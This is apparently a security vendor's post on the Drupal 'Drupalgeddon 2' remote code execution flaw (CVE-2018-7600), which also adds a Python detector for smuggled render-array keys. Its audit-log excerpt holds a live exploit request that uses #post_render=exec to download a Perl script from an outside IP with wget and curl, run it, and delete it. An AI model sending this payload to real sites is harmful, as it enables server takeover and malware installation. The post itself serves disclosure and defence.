Drupal – Remote Code Execution (SA-CORE-2018-002 / CVE-2018-7600) nicknamed Drupalgeddon 2


This vulnerability was discovered by the Drupal security team two weeks ago. It is rated highly critical (25/25 NIST rank), tracked as SA-CORE-2018-002 / CVE-2018-7600, and nicknamed Drupalgeddon 2. It allows an unauthenticated attacker to perform remote code execution.

An exploitation method for this vulnerability was published a few days ago; it lets an attacker execute arbitrary code on the server with the permissions of the web server user.

Example request

The vulnerability is very easy to exploit: all the attacker needs to do is send a request with the payload to the endpoint below. The excerpt is taken from a ModSecurity audit log (the --56f4611e-B-- marker opens the request-line and headers section, --56f4611e-C-- the request-body section):

--56f4611e-B--
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1

Post Payload

--56f4611e-C--
mail%5B%23markup%5D=cd+%2Fvar%2Ftmp%2F+%3B+cd+%2Ftmp%2F+%3Bwget+http%3A%2F%2F195.22.126.16%2F2sm.txt%3B+lwp-download+http%3A%2F%2F195.22.126.16%2F2sm.txt%3B+fetch+http%3A%2F%2F195.22.126.16%2F2sm.txt+%3B+curl+-O+http%3A%2F%2F195.22.126.16%2F2sm.txt%3B+perl+2sm.txt+195.22.127.225%3B+rm+-rf+2sm.txt&mail%5B%23type%5D=markup&form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec
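The request above works because Drupal's Form API treats parameter keys beginning with "#" (such as #post_render, #markup and #type) as render-array properties rather than user data, and the fix in SA-CORE-2018-002 strips such keys from incoming input. The following detector, written for this post as an added example (it is not code from the original post nor from the Malware Expert rule set), applies that same idea to a request line and form body: it URL-decodes the query string and body, extracts every "#"-prefixed segment from PHP-style parameter names, and also flags an element_parents value that points at a render-array key. The sample request is constructed to mirror the audit-log excerpt above, with the command payload replaced by a harmless value.

```python
"""Flag Drupalgeddon 2 style requests: Form API render-array keys (names
starting with '#') smuggled in through user-controllable parameters.
Added example, not part of the original post."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed samples modelled on the audit-log excerpt in the post.
# The body payload is replaced by the harmless value "id".
SAMPLE_ATTACK_LINE = ("POST /user/register?element_parents=account/mail/%23value"
                      "&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1")
SAMPLE_ATTACK_BODY = ("mail%5B%23markup%5D=id&mail%5B%23type%5D=markup"
                      "&form_id=user_register_form&_drupal_ajax=1"
                      "&mail%5B%23post_render%5D%5B%5D=exec")
# A constructed, ordinary registration request for comparison.
SAMPLE_BENIGN_LINE = "POST /user/register HTTP/1.1"
SAMPLE_BENIGN_BODY = ("name=alice&mail=alice%40example.com"
                      "&form_id=user_register_form&op=Create+new+account")

# Matches a '#'-prefixed segment either at the top level of a parameter name
# or inside PHP array brackets, e.g. '#markup' or 'mail[#post_render][]'.
_RENDER_KEY = re.compile(r"(?:^|\[)(#[^\[\]]*)(?=\]|$)")


def render_array_keys(param_name):
    """Return every '#'-prefixed segment of a decoded parameter name.

    'mail[#post_render][]' -> ['#post_render'];  'mail' -> []
    """
    return _RENDER_KEY.findall(param_name)


def parse_request(request_line, body=""):
    """Split an HTTP request line and decode its query string and form body."""
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    # parse_qsl percent-decodes names and values and turns '+' into spaces,
    # so 'mail%5B%23markup%5D' becomes 'mail[#markup]'.
    return {
        "method": method,
        "path": parts.path,
        "query": parse_qsl(parts.query, keep_blank_values=True),
        "form": parse_qsl(body, keep_blank_values=True),
    }


def analyze(request_line, body=""):
    """Return a verdict and the list of indicators found in the request."""
    req = parse_request(request_line, body)
    indicators = []
    for source in ("query", "form"):
        for name, value in req[source]:
            # Any '#'-prefixed key in client input is suspicious: the Drupal
            # fix for SA-CORE-2018-002 strips exactly these keys.
            for key in render_array_keys(name):
                indicators.append(
                    f"{source} parameter '{name}' carries render-array key {key}")
            # element_parents steering the AJAX callback at a '#' property.
            if name == "element_parents" and "#" in value:
                indicators.append(
                    f"element_parents targets a render-array key: {value}")
    return {"path": req["path"], "suspicious": bool(indicators),
            "indicators": indicators}


if __name__ == "__main__":
    for line, body in ((SAMPLE_ATTACK_LINE, SAMPLE_ATTACK_BODY),
                       (SAMPLE_BENIGN_LINE, SAMPLE_BENIGN_BODY)):
        result = analyze(line, body)
        print(result["path"], "suspicious" if result["suspicious"] else "clean")
        for indicator in result["indicators"]:
            print("  -", indicator)
```

Running the block prints four indicators for the constructed attack request (the element_parents value plus the #markup, #type and #post_render keys) and marks the ordinary registration request clean. Checking for any "#"-prefixed key, rather than for #post_render alone, follows the upstream fix and avoids having to enumerate individual render-array properties in a rule.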

Final words

If you have not already, update your Drupal installation as soon as possible!

Websites using the Malware Expert – ModSecurity rules are protected against this attack.